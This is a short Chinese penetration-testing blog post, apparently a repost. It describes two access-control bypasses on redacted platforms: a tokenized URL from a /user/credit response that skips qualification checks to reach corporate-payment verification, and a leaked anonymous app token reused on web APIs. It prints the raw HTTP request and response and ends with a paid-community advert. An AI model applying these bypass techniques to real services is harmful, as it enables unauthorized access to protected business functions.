No.0
前言
挖洞就是要多思考,要是没有权限我们需要如何突破限制进行测试
,我是
No.2
案例一
首先登录XXXX平台
然后找到以下接口。
GET /user/credit?company=111111 HTTP/1.1Host: nXXXXCookie: XXXXXSec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9If-Modified-Since: Tue, 02 Jul 2024 10:44:17 GMTPriority: u=0, iConnection: keep-alive
返回包:
HTTP/1.1 200 OKConnection: keep-aliveContent-Type: application/json;charset=UTF-8Date: Fri, 16 Aug 2024 09:50:07 GMTX-B3-Spanid: 663d4f5fb8605800X-B3-Traceid: eb7f16085bb411ef96336f37270dcc88Content-Length: 375{"code":200,"message":"success","data":"https://xxxxxx/trust/vmagic/bacct-service?appid=11&dimid=1001683651&token=jBpHCy8CWzqksLDpKjX4GAUNUSoasO8ZChWIiG8Lrnyt6tBreLiZi6bBqvNc-imcXz5rXdDg.&theme=bluemode"}直接访问该链接。https://xxxxxxx/rust/vmagic/bacct-service?appid=11&dimid=1001683651&token=jimcXz5rXdDg.&theme=bluemode
可直接访问对公打款认证
填了下信息并提交,显示待打款状态,提交成功。
而正常的流程是这样的。
首先进入认证。
https://xxxxx/uauth/login
进入后台需要经过资质认证才能进行对公打款认证。这样的话,就可以绕过资质认证,直接进入打款认证。
No.3
案例二
Web无账号,不能查看后台接口
此时app的js刚好泄露了匿名token
我们把匿名token拼接在web接口上
如果没有token,是提示401的
如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
往期回顾
文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247496175&idx=1&sn=95930a0e2e553c9e841265e8019d00b4&chksm=e8a5fb8cdfd2729a236f6266c5c0caf2bf41570798b529f8dfea139d77c7d2ca1f13e8071878&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh